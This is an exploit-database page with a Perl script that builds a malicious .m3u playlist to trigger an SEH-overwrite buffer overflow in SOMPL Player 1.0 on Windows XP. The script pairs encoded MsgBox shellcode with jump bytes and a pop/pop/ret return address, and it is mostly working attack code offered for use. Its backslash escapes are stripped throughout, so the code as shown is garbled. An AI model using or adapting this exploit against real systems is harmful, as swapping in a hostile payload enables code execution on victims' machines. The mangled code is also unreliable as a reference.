SOMPL Player Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SOMPL Player Buffer Overflow
# Published : 2010-01-22
# Author : Rick2600
# Previous Title : Winamp v5.572 whatsnew.txt Local Buffer Overflow Exploit WinXP SP3 De
# Next Title : IE wshom.ocx (Run) ActiveX Remote Code Execution (add admin user)
# Exploit Title : SOMPL Player Buffer Overflow
# Date          : 20 January 2010
# Author        : Rick2600 (ricks2600[at]gmail{dot}com)
# Bug found by  : Rick2600 (ricks2600[at]gmail{dot}com)
# Software Link : http://www.softpedia.com/progDownload/SOMPL-Download-144999.html
# Version       : 1.0
# Issue fixed in: ???
# OS            : Windows
# Tested on     : XP SP2 and SP3 En
# Type of vuln  : Buffer Overflow
# Ref           : http://seclists.org/bugtraq/2010/Jan/160
# Greetz to     : Corelan Security Team:: corelanc0d3r, EdiStrosar, mr_me, ekse, MarkoT, sinn3r
#
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :

print "|------------------------------------------------------------------|n";
print "|                         __               __                          |n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |n";
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |n";
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |n";
print "|                                                                  |n";
print "|                                       http://www.corelan.be:8800 |n";
print "|                                                                  |n";
print "|-------------------------------------------------[ EIP Hunters ]--|n";
print "[+] SOMPL Player Buffer Overflow - SEH Overwriten";


$header = "#EXTM3Un#EXTINF:";

#Shellcode: x86/alpha_mixed( MsgBox )
$shellcode =
"x89xe7xdbxcfxd9x77xf4x59x49x49x49x49x49x49" .
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5a" .
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" .
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" .
"x75x4ax49x48x6bx44x62x50x56x46x51x4bx70x42" .
"x44x4cx4bx43x70x46x50x4bx35x4bx70x51x68x44" .
"x4cx4ex6bx47x30x44x4cx4cx4bx50x70x47x6cx4c" .
"x6dx4cx4bx43x70x46x68x4ax4bx46x69x4cx4bx43" .
"x70x44x74x4ex6dx43x70x51x6cx4cx4bx47x30x45" .
"x6cx43x6ex4fx33x48x6bx45x39x45x30x4cx4bx42" .
"x4cx51x34x51x34x4ex6bx43x75x47x4cx4ex6bx51" .
"x44x47x75x43x48x46x61x49x7ax4ex6bx50x4ax47" .
"x68x4ex6bx42x7ax51x30x43x31x4ax4bx4ax43x50" .
"x34x47x39x4cx4bx44x74x4cx4bx43x31x48x6ex50" .
"x31x4bx4fx45x61x49x50x4bx4cx4cx6cx4dx54x49" .
"x50x44x34x43x37x4ax61x48x4fx46x6dx46x61x48" .
"x47x48x6bx4bx44x45x6bx43x4cx44x64x46x48x50" .
"x75x4dx31x4cx4bx43x6ax51x34x47x71x48x6bx50" .
"x66x4cx4bx44x4cx50x4bx4cx4bx51x4ax45x4cx46" .
"x61x4ax4bx4cx4bx43x34x4cx4bx46x61x48x68x4d" .
"x59x47x34x46x44x45x4cx50x61x4fx33x4ex4dx42" .
"x70x46x32x48x68x4fx5ax4bx4fx4bx4fx49x6fx4e" .
"x69x43x37x51x54x51x54x47x34x43x74x43x74x47" .
"x34x43x74x42x64x47x37x47x37x50x47x42x67x50" .
"x39x48x4ex51x65x4bx56x4ax63x42x6cx50x4cx42" .
"x6cx42x6cx4dx59x4bx55x4bx58x45x38x4bx4fx49" .
"x6fx49x6fx4cx49x4bx72x48x6bx45x4cx51x4ex4c" .
"x4dx51x6dx45x54x4ex69x4cx31x4bx30x49x51x46" .
"x6cx48x68x4fx38x49x6fx49x6fx4bx4fx48x6bx47" .
"x65x45x61x49x42x51x49x4cx48x42x71x42x34x43" .
"x61x42x72x4bx4fx50x54x44x64x44x4cx4ax48x4b" .
"x6fx4bx4fx4bx4fx4bx4fx51x47x51x6fx51x39x42" .
"x42x48x68x48x66x4bx4fx49x6fx49x6fx47x33x42" .
"x4fx43x42x51x75x42x4cx50x61x42x4ex51x30x50" .
"x54x51x75x43x51x50x6dx51x30x44x6dx47x50x42" .
"x70x42x77x50x4ex50x45x42x64x42x78x41x41";

$filename = "somplPOC.m3u";
print "[+] Check: $filenamenn";

$buffer = "x90" x 5;
$buffer .= $shellcode;
$buffer .= "B" x (4138 - length($shellcode));
$buffer .= "xE9xCDxEFxFFxFF";
$buffer .= "xEBxF9x90x90";
$buffer .= pack("V", 0x32501B07); # pop/pop/ret Universal from cc3250mt.dll



open (FILE, ">$filename");
print  FILE $buffer;
close(FILE);